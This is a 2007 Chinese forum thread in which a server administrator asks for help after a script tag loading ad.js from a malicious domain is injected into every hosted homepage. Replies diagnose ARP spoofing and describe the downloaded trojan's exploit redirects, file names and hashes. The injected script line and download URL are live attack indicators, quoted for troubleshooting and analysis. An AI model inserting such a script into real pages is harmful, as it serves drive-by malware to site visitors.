社区
安全技术/病毒
帖子详情
服务器网页被挂木马。无法查杀,如何解决~~~急急
wutieming
2007-05-22 10:56:14
单位服务器,2003系统,现在打开服务器的每个站点的首业发现都有
<script language=javascript src=http://google.171738.org/ad.js></script> 这段代码。但是用记事本打开站点的首页文件发现又没有 上面这段代码/。
用 windows清理助手和瑞星查杀都无法找到病毒。
现在不知道怎么处理,恳请知道的告诉处理方法谢谢/。
...全文
724
8
打赏
收藏
服务器网页被挂木马。无法查杀,如何解决~~~急急
单位服务器,2003系统,现在打开服务器的每个站点的首业发现都有 这段代码。但是用记事本打开站点的首页文件发现又没有 上面这段代码/。 用 windows清理助手和瑞星查杀都无法找到病毒。 现在不知道怎么处理,恳请知道的告诉处理方法谢谢/。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
8 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
紫郢剑侠
2007-05-24
打赏
举报
回复
update.exe
Kaspersky 报为 Worm.Win32.Delf.cc,瑞星报为 Trojan.Mnless.lxp
还会下载
文件说明符 : D:\test\rss.dll
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720
紫郢剑侠
2007-05-23
打赏
举报
回复
看其别的网站,比如www.163.com,时是否有此代码?
没有0614漏洞,页面转到ms07004EXP!
存在0614漏洞,页面转到MS0614的EXP!"
下载 hxxp://google.171738.org/update.exe
文件说明符 : D:\test\update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b
smallcrocodile
2007-05-22
打赏
举报
回复
恨毒恨的牙痒痒
紫郢剑侠
2007-05-22
打赏
举报
回复
看其别人的网站时是否朋此代码?
jiaxueq
2007-05-22
打赏
举报
回复
恭喜,服务器中了ARP欺骗。
可能是你自己的服务器中了,也可能是机房里的同一个网段的其它服务器中了。
安装 ARP防火墙 搞定!
wutieming
2007-05-22
打赏
举报
回复
那项没有被改动,现在是发现同一个网段内的所有服务器上站点内的首页文件都有这句代码/
现在不知道怎么弄了/
按照二楼兄弟给的方法在绿色软件联盟内弄了个( MAC地址绑定工具(防ARP攻击的绿色小工具) )
帮顶了MAC地址,还是不行。
代码跳动
2007-05-22
打赏
举报
回复
在iis里有个定义页底部的.查查看
wutieming
2007-05-22
打赏
举报
回复
现在网上的ARP防火墙都是注册的。有免费版本的么??
我发现在同一个网段里的同一台机器上的站点首页也是这个问题~!~首页被挂那句代码,
HTML5 CSS3 专题 :诱人的实例 3D旋转
木马
效果相册实例源码
代码为博客实例代码 http://blog.csdn.net/lmj623565791/article/details/32964301 有问题博客中留言
mysql数据库
木马
查杀
_
服务器
木马
后门怎么
查杀
木马
和后门的
查杀
是系统管理员一项长期需要坚持的工作,特别是如今入侵攻击越来越频繁,如果
服务器
自身的安全防护工作没有做好,很可能随时都会被入侵
挂
上
木马
后门。那么
服务器
木马
后门怎么
查杀
?我们一起来了解下。
服务器
木马
后门怎么
查杀
windows
服务器
的
木马
后门
查杀
教程相对校对,这里就介绍linux系统
服务器
的后门
查杀
方法,以下从几个方面在说明Linux系统环境安排配置防范和
木马
后门
查杀
的方法:一、Web ...
Kali Linux渗透测试之Msfvenom
木马
生成与攻防实战
一、课程概要 本课程主要分享Kali Linux渗透测试之Msfvenom
木马
生成与攻防实战技巧!二、适合人员 1、零基础大学生 2、IT技术人员 3、
服务器
运维工程师 4、渗透测试工程师三、特别说明 1、本课程支持一次购买,享受永久观看! 2、本课程支持一次购买,享受永久更新! 3、本课程系讲师原创课程,如有盗用,欢迎举报!
ftp文件
服务器
杀毒,FTP远程
查杀
网页
木马
方法
感谢使用护卫神·云
查杀
系统,该软件专门
查杀
网页
木马
,完全免费,欢迎大家使用。远程FTP
查杀
部分:1、点击【远程
查杀
】图标,如上图所示,进入远程FTP
查杀
页面:1、首先要求输入远程FTP连接信息,并点击保存;2、本地缓存:默认为软件旁边的cache目录,用户可以自行进行改变设置,目的是暂存FTP上下载下来的文件。3、测试成功后,在
查杀
目标中选择需要
查杀
的FTP目标:说明:1、通用模式和极限模式:通用...
网站
服务器
rookit级
木马
后门
查杀
分析
也就是说他做了一些这个隐藏,加入到内核里之后,看这都是挖点,说明已经被更改了,那这个时候就要去排查了,他是不是真的被更改了,或者说看一下是不是真的被替换了,那就需要去排查一下了。那第二种方法就是说这种就比较顽强的了,你要把Linux
挂
载到其他的Linux系统上,去找到它,这样的话把它删除掉就可以了。它可以隐藏文件,那它就可以隐藏自身。也就是说我在利用这条命令去看,如Kate的时候,有可能是看不见的,这里看见了,也就是说我可以隐藏自己,但是我这里没有配置,编译的时候没有配置,所以他没有隐藏自己。
安全技术/病毒
9,506
社区成员
28,984
社区内容
发帖
与我相关
我的任务
安全技术/病毒
Windows专区 安全技术/病毒
复制链接
扫一扫
分享
社区描述
Windows专区 安全技术/病毒
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章